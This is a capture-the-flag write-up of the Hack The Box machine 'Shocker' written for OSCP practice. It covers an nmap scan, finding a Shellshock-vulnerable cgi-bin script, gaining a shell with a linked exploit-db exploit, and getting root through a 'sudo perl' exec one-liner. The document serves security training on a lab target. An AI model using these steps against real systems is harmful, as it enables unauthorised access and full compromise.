Hack The Box — Shocker — without Metasploit (TJNull’s list for OSCP)
This is my 6th write-up for Shocker, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target.
nmap -sC -sV -O -A -T4 10.129.58.135
- -sC is used to run default scripts to enumerate the services further.
- -sV is used for Version enumeration of the services
- -O is used to for OS enumeration. (not usually needed if you use -A. But who cares)
- -A is used for aggressive (not usually recommended in a real environment)
- -T4 is used to set the number of parallel threads.
- -Pn is used to force enumerate even if the machine is not responding to icmp (ping) packets.
We can see an Apache Web Server is running on Port 80 and an SSH server is running on non-standard port 2222 (usually SSH runs on port 22).
Let’s see what do we have on the web server.
There’s just an Image with some text “Don’t bug me!”. I looked into source code and http headers, couldn’t find anything useful.
Let’s try directory busting using dirbuster with lowercase-2.3-medium.txt file.
Here we found cgi-bin directory with Response 403 (Forbidden). Means that we can not directly access this directory, but it could be possible to access the contents instead. Also, the Machine name “Shocker” along with cgi-bin enabled indicates that there could be the Shellshock vulnerability.
For Shellshock to exist in a webserver, it has to have cgi-bin enabled along with some script in it. More about shellshock here: https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
Let’s see if we have any script inside cgi-bin, using dirbuster again.
This time our starting directory will be /cgi-bin/ because we are searching for files specifically in that directory. Also, we have extended our search for file extensions from only php to php, cgi, sh, js, asp just to find any of the specified file extension scripts.
So we found user.sh script inside cgi-bin directory. It means that most likely we are ready to execute our shellshock exploit.
Initial Foothold
First let’s look at the script that we have.
It seems like this is just a test script to display service uptime.
Searching for shellshock exploit-db leads us to the following exploit.
https://www.exploit-db.com/exploits/34900
Let’s download it and run it using python2 since it’s written in python2.
This script accepts some arguments, that are defined here. We need rhost, rport, lhost, lport, pages and payload argument to run this exploit. Since, we know all these things, let’s run this exploit with the arguments that are needed.
We got a shell!
It looks like we have a shell as user shelly.
Let’s escalate our privileges to get root access.
Privilege Escalation
As usual, first I would like to see what commands can shelly run as root user using sudo.
sudo -l
It looks like the current user shelly can run perl as root using sudo. Now, I know how can I spawn a shell using perl. Now, since I can run perl as root and I can spawn a shell from perl. It’s very easy to spawn a root shell.
sudo perl -e ‘exec “/bin/sh”;’
And we got a root shell!
Let’s collect the root flag.
EZ! :)
